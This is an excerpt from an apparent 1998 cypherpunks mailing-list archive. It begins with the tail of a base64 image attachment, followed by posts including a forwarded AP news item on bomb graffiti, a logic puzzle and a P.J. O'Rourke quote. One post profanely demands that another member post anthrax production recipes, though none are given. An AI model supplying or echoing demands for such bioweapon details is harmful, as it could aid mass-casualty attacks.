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
lcfjW8keLbNAXJ1uLAhJMNUmHcoovdJYndVabcoDV8rCvNGX/EUxKEc7fcWH
yc3vcFaGfNNGasu3DESwG9RCTdFAqc9uSwo4C3HXoLtzpMkPq8xNrcyxOtUl
XdT5DABbndiKndJXndUZ3ZQyzdHt+HKfVNZmHZUJ68SvPC9rzdAMO3HU+8sl
taxDvbJVTa+lnW1gDc9svJnyHMYhLdjVWdj5XJuLfdu4Dc2DsNXkm8qsHVLP
xGiWPdw37ZrEzdM9/R7n0qOGzbpvK9f1WlJ2jdFn3CerzdfR+sVfbMAAHMPT
a9gnndviLd677dgaG9nF3JAM09nHvf/TsezZ7+3ZclejbHJGk3zOkFvX68zL
zHrDdojerE17ETrAk/i63k3P4C3KjT3eDJ7YC+7PECzZS9Peww2d7A2d7p1p
5hox6lybuuzc6GzBci0IPFDiPADipDpfj90Y163HoTCWM1yKH+20sh2rtU3H
DZ7jDo7YKw3BAM7afkHhZQ2fzrvNN5nh8y2CkSm3CZ5S/V3a033U8srLMMpJ
uNLi2AwKVZ2hYLndTl3jOXrjuazjZM7bPM7Y51ugP667oSLk8H3kCA3nsrzN
Gopl8OhsTe7hm0bd94nig6ACgB7ogq4CqB3HvWvda57l92zVPvrRRF7AUr3l
Q/zgZV7pLH3/5mauQlhO0w3D3vBdEwbc2duttCtsxQzrZB9a22qC4qVtRqwu
CIMO6I5g4iXOuvGs0YlOh3ne5wYe6l06CIS960SM6ZZe7NJM6Vrt26rc6cR9
2m9syF4OznJe504k6U6+LmW8yzc86INA695e643czgiC5XQo5vM4vbC9ySRN
2LRt7kNk7PB+6QqB1Uq91Mjj6bSc2cL+m69N6vxu6tRe7bueNayOs6hN0bJO
4t++8OB+19XtNZhMtaru1wUe0lLN7u3u7qMc7xyf7MR+7Lle0F5B50W+zYwO
jNjLv7G6vwEv8EXtTwV/w3sZ8wBA6ADA8N9OCjb/3KGU6Flu7TQL/+q+bsAY
T9XCbtcdn/QNTu4ij++H7Ozyo+6v3eXQ3vJw5JhBFDF0mw03fPO0PusNn/CB
7tzWeOiWvMYSr/Ft6wiFbQ1Fn/HmjuxKP/eOjcmK5vRPn+DW+dTfPYmlq6bn
6k/Ynu2O/Nwn/uexbvM6n/B5bWUgc+URD/TDZA1kCuxFv+6Xf/T6TPecv+No
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
ADs=
--Boundary..3999.1071713823.multipart/mixed--



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Petro <petro@playboy.com>
Date: Thu, 24 Dec 1998 23:47:11 +0800
To: Reeza! <howree@cable.navy.mil>
Subject: Re: I must admit. . .
In-Reply-To: <Pine.LNX.3.96.981217215047.32327C-100000@zor.hut.fi>
Message-ID: <v04011709b2a5c236dfd8@[207.138.127.230]>
MIME-Version: 1.0
Content-Type: text/plain





If ANTHRAX recipes are so easily obtainable, if it is so easy to make, so
easy to disseminate, and public knowledge to boot, POST IT HERE, POST IT
HERE.

24 hour time limit, IF IT IS EASY, You shouldn't have any trouble making
the deadline now should you? And none of that "I don't want to give away
inappropriate information" pussy shit. It is wholly relevant, not
inappropriate, and will MAKE ME APOLOGIZE TO YOU AND THE LIST.

DO IT. DO IT. DO IT,

http://www.hiphopmusic.com/anthrax.html

(apologoes if the quoting on this isn't quite right).
"The two enemies of the people are criminals and government, so
let us tie the second down with the chains of the constitution so the
second will not become the legalized version of the first."
Thos. Jefferson					petro@playboy.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Wed, 23 Dec 1998 01:53:50 +0800
To: cypherpunks@toad.com
Subject: politically correct bomb graffiti
Message-ID: <199812221723.SAA13248@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



..way too amusing..


 Pentagon Decries U.S. Bomb Graffiti 
Tuesday, December 22, 1998; 1:24 a.m. EST

WASHINGTON (AP) -- Defense Department officials said Monday they were
distressed about ``thoughtless graffiti'' referring to the Islamic holy
month of Ramadan on a Navy bomb being prepared for dropping on Iraq. 

The Associated Press last Saturday transmitted a photograph of a
2,000-pound laser-guided bomb on the aircraft carrier USS Enterprise in the
Persian Gulf waiting to be loaded on F-14 and F-18 jet fighters. 

The bomb bore several inscriptions, including one that said, ``Here's a
Ramadan present from Chad Rickenberg.'' 

``Department of Defense officials were distressed to learn of thoughtless
graffiti mentioning the holy month of Ramadan written on a piece of U.S.
ordnance during Operation Desert Fox'' in Iraq, chief Pentagon spokesman
Kenneth Bacon said in a statement. 

``Religious intolerance is an anathema to Secretary of Defense William S.
Cohen and to all Americans who cherish the right to worship freely,'' he
added. ``The United States deeply respects Islam. We are grateful for our
good relations with Arab and Islamic peoples, and we appreciate the
important contributions of Muslim-Americans to the U.S. military and to our
nation as a whole. 

``I know our people in uniform respect and appreciate religious practices
different from their own. This incident is a rare exception that does not
reflect American policy or values.'' 
 






  







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rajiv Malik <rajiv.malik@riverrun.com>
Date: Tue, 22 Dec 1998 21:48:20 +0800
To: "cypherpunks@toad.com>
Subject: This one spl. for anonymous (X-mas puzzle)
Message-ID: <36802B35.83ACD1D0@riverrun.com>
MIME-Version: 1.0
Content-Type: text/plain



Hi there

I remember u posted a nice puzzle long back this one
spl. for u :
-->
There are two persons. A pair of no is written on each's face. They can
see the no (pair of no) written on the other's face and they have to
tell the no written on their face. They start one by one. 
Lets say one person starts he can see the no written on his opponents
face , its (13,17). After 3 tries he tells the correct answer.
The nos exhibit the following properties:
1> All the nos are prime.
2> Any three no taken ( from the set of 4 nos, two no on each's face)
together form a triangle and the perimeter of the triangle is prime.

Now you have tell the no written on that persons face and why it took
him three tries.
The conversation between the two persons is as follows
Let p1 and p2 be the persons and 
p1 starts and p1 saw the no (13,17) written in p2.

p1> I don't know
p2> I don't know
p1> I don't know
p2> I don't know
p1> Tells the right no.

enjoy (Happy X-mas)
Rajiv

PS : I'm off till 28th So u have enough time.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Wed, 23 Dec 1998 08:21:18 +0800
To: cypherpunks@cyberpass.net
Subject: CL: PJ O'Rourke on economic books & Hayek
Message-ID: <v04020a0cb2a5dfedbafb@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain



My only exception to this rule is "Investments", by Sharpe, which,
unfortunately, isn't for the innumerate. :-).

Cheers,
RAH
--- begin forwarded text


Date:         Tue, 22 Dec 1998 16:56:45 EST
Reply-To: Hayek Related Research <HAYEK-L@MAELSTROM.STJOHNS.EDU>
Sender: Hayek Related Research <HAYEK-L@MAELSTROM.STJOHNS.EDU>
From: Hayek-L List Host <HayekList@AOL.COM>
Subject:      CL: PJ O'Rourke on economic books & Hayek
To: HAYEK-L@MAELSTROM.STJOHNS.EDU

  >>  Current Literature  <<   --  economics / humor


"A NOTE ABOUT THE BIBLIOGRAPHY

There isn't one.  I'm too lazy.  And who ever heard
of humor with footnotes?  But there are certain books
which I found crucial to a neophyte student of
economics, especially if (and I mean no insult to
the texts by this) that student is uninformed, innumerate,
light-minded, and a big goof-off.  In other words, these
are the books to read if you want to know something
about economics but have never gotten further into the
subject than figuring out a trifecta at Belmont:

  _Free to Choose_ and _Capitalism and Freedom_
by Milton and Rose Friedman ,,,

  _The Road to Serfdom_ by Friedrich A. Hayek ,,,

  _The Armchair Economist by Steven E. Landsburg ,,,

There are certain books you should avoid, such as
anything with the words Investment and Success in the title
and everything ever written by John Kenneth Galbraith ,,,"


P. J. O'Rourke, _Eat the Rich: A Treatise On Economics_.
New York: Atlantic Monthly Press.  1998.  pp. xvi-xvi.



Current Literature is a regular feature of the Hayek-L list.

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
